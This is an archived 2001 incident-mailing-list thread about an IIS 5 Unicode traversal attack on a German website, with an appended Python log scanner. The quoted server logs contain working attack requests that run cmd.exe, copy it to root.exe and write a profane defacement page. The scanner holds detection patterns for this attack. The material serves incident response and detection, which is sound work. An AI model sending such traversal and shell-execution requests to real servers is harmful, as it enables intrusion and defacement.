RE: who's owning this ip?

From: Matt Rowley (matt.rowleyat_private)
Date: Mon May 14 2001 - 10:26:17 PDT


    http://www.arin.net/cgi-bin/whois.pl
    to reverse-lookup the IP for the coordinator.
    
    --Matt
    
    > -----Original Message-----
    > From: Incidents Mailing List [mailto:INCIDENTSat_private]On
    > Behalf Of Thomas Springer
    > Sent: Tuesday, May 08, 2001 12:08 PM
    > To: INCIDENTSat_private
    > Subject: who's owning this ip?
    >
    >
    > We had an attacker exploiting Unicode on IIS 5 yesterday - see the funny
    > Chinese war pages in the log below. The hacker successfully exploited the
    > IIS Unicode bug, created ~100 files but was still too dumb to deface the
    > webserver.
    >
    > The attacker used 208.22.161.15 and 202.97.205.3.
    > I tried a trace but ended up with
    >  ...
    >  19   210 ms   211 ms   220 ms  pao1-sjc2-oc48-2.pao1.above.net [
    >  20   210 ms   231 ms   230 ms  208.184.129.244.cmnetcom.com.hk [
    >  21   200 ms   211 ms   220 ms  202.0.170.34
    >  22   361 ms   370 ms   411 ms  202.0.170.13
    >  23   370 ms   391 ms   400 ms  202.97.10.193
    >  24   521 ms   541 ms   551 ms  202.97.10.66
    >  25   581 ms   601 ms   581 ms  61.138.38.2
    >  26   721 ms   711 ms   671 ms  61.180.139.202
    >  27   341 ms   350 ms   351 ms  202.97.205.3
    >
    > 208.22.161.15 seems to end at
    > 17   130 ms   130 ms   131 ms  ewr-core-02.inet.qwest.net
    > [205.171.17.130]
    > 18   110 ms   110 ms   111 ms  ewr-brdr-01.inet.qwest.net
    > [205.171.17.82]
    > 19     *        *        *     Timeout..
    > ....
    >
    > Any chance to find out to whom the two IP addresses belong?
    > Any tool that copies cmd.exe to root.exe?
    >
    > I liked this hack, because nothing happened and people here suddenly
    > develop security awareness. Hence, even the servers I begged to secure
    > for weeks are patched now.
    > BTW it's a German website - nothing to do with any
    > Chinese-American spy wars.
    >
    > funny hackerworld...
    >
    > thomas
    >
    > --- IIS-Logsnip ---
    > 2001-05-07 12:28:54 208.22.161.15 - 10.253.6.15 80 GET
    > /scripts/../../winnt/system32/cmd.exe /c+dir 200 664 66 - - -
    > 2001-05-07 12:28:54 208.22.161.15 - 10.253.6.15 80 GET
    > /scripts/../../winnt/system32/cmd.exe /c+dir+..\ 200 856 70 - - -
    > 2001-05-07 12:28:54 208.22.161.15 - 10.253.6.15 80 GET
    > /scripts/../../winnt/system32/cmd.exe
    > /c+copy+\winnt\system32\cmd.exe+root.exe 502 382 100 - - -
    > 2001-05-07 12:28:54 208.22.161.15 - 10.253.6.15 80 GET /scripts/root.exe
    > /c+echo+^<html^>^<body+bgcolor%3Dblack^>^<br^>^<br^>^<br^>^<br^>
    > ^<br^>^<br^>
    > ^<table+width%3D100%^>^<td^>^<p+align%3D%22center%22^>^<font+siz
    > e%3D7+color%
    > 3Dred^>fuck+USA+Government^</font^>^<tr^>^<td^>^<p+align%3D%22ce
    > nter%22^>^<f
    > ont+size%3D7+color%3Dred^>fuck+PoizonBOx^<tr^>^<td^>^<p+align%3D
    > %22center%22
    > ^>^<font+size%3D4+color%3Dred^>contact:sysadmcnat_private^</h
    > tml^>>.././i
    > ndex.asp 502 355 423 - - -
    > 2001-05-07 12:28:55 208.22.161.15 - 10.253.6.15 80 GET /scripts/root.exe
    > /c+echo+^<html^>^<body+bgcolor%3Dblack^>^<br^>^<br^>^<br^>^<br^>
    > ^<br^>^<br^>
    > ^<table+width%3D100%^>^<td^>^<p+align%3D%22center%22^>^<font+siz
    > e%3D7+color%
    > 3Dred^>fuck+USA+Government^</font^>^<tr^>^<td^>^<p+align%3D%22ce
    > nter%22^>^<f
    > ont+size%3D7+color%3Dred^>fuck+PoizonBOx^<tr^>^<td^>^<p+align%3D
    > %22center%22
    > ^>^<font+size%3D4+color%3Dred^>contact:sysadmcnat_private^</h
    > tml^>>.././i
    > ndex.htm 502 355 423 - - -
    >
    >
    > Thomas Springer
    
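As an added illustration (not code from the thread or from either poster), a small Python scanner for IIS W3C-format log lines that flags the request pattern visible in Thomas's log: a decoded `..` traversal or an overlong-UTF-8 stem as sent on the wire, a request aimed directly at cmd.exe or root.exe, a query that copies cmd.exe, and shell output redirected into a file. The sample log is constructed from the excerpt above, with the long defacement query shortened and one benign request added.

```python
import re
from urllib.parse import unquote

# Constructed sample log, modelled on the IIS W3C extended-format excerpt in
# the thread (the long defacement "echo" query is shortened). Field order:
# date time c-ip cs-username s-ip s-port cs-method cs-uri-stem cs-uri-query sc-status ...
SAMPLE_LOG = r"""
2001-05-07 12:28:54 208.22.161.15 - 10.253.6.15 80 GET /scripts/../../winnt/system32/cmd.exe /c+dir 200 664 66 - - -
2001-05-07 12:28:54 208.22.161.15 - 10.253.6.15 80 GET /scripts/../../winnt/system32/cmd.exe /c+copy+\winnt\system32\cmd.exe+root.exe 502 382 100 - - -
2001-05-07 12:28:54 208.22.161.15 - 10.253.6.15 80 GET /scripts/root.exe /c+echo+^<html^>...^>>.././index.asp 502 355 423 - - -
2001-05-07 12:30:01 192.0.2.10 - 10.253.6.15 80 GET /index.htm - 200 1200 300 - - -
"""

TRAVERSAL = re.compile(r"\.\.[/\\]")               # "../" or "..\" once the stem is decoded
OVERLONG = re.compile(r"%c[01]%[0-9a-f]{2}", re.I)  # overlong UTF-8 (C0/C1 lead byte) still percent-encoded
SHELLS = ("cmd.exe", "root.exe")

def parse_line(line):
    """Split one W3C log line into the fields we need; None for comments or short lines."""
    parts = line.split()
    if len(parts) < 10 or parts[0].startswith("#"):
        return None
    return {"time": parts[1], "c_ip": parts[2], "method": parts[6], "stem": parts[7], "query": parts[8], "status": parts[9]}

def classify(entry):
    """Return the tags that make a request look like the traversal/cmd.exe pattern, [] if benign."""
    tags = []
    raw_stem = entry["stem"]
    stem = unquote(raw_stem).lower()                      # normalise standard %xx encoding before matching
    query = unquote(entry["query"]).replace("+", " ").lower()
    if TRAVERSAL.search(stem) or OVERLONG.search(raw_stem):
        tags.append("traversal")
    if stem.rsplit("/", 1)[-1] in SHELLS:
        tags.append("shell")          # request aimed directly at an interpreter
    if "copy" in query and "cmd.exe" in query:
        tags.append("copy_shell")     # staging a renamed copy of cmd.exe (root.exe) in a script dir
    if ">" in query:
        tags.append("redirect")       # shell output redirected into a file, as in the defacement echo (heuristic)
    return tags

def scan(log_text):
    """Return (c_ip, time, stem, status, tags) for every suspicious line."""
    hits = []
    for entry in filter(None, map(parse_line, log_text.splitlines())):
        tags = classify(entry)
        if tags:
            hits.append((entry["c_ip"], entry["time"], entry["stem"], entry["status"], tags))
    return hits
```

Grouping the hits by c-ip gives the same two addresses Thomas asked about, which is the list you then feed to the WHOIS lookup Matt points at.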
    This archive was generated by hypermail 2b30 : Mon May 14 2001 - 14:43:52 PDT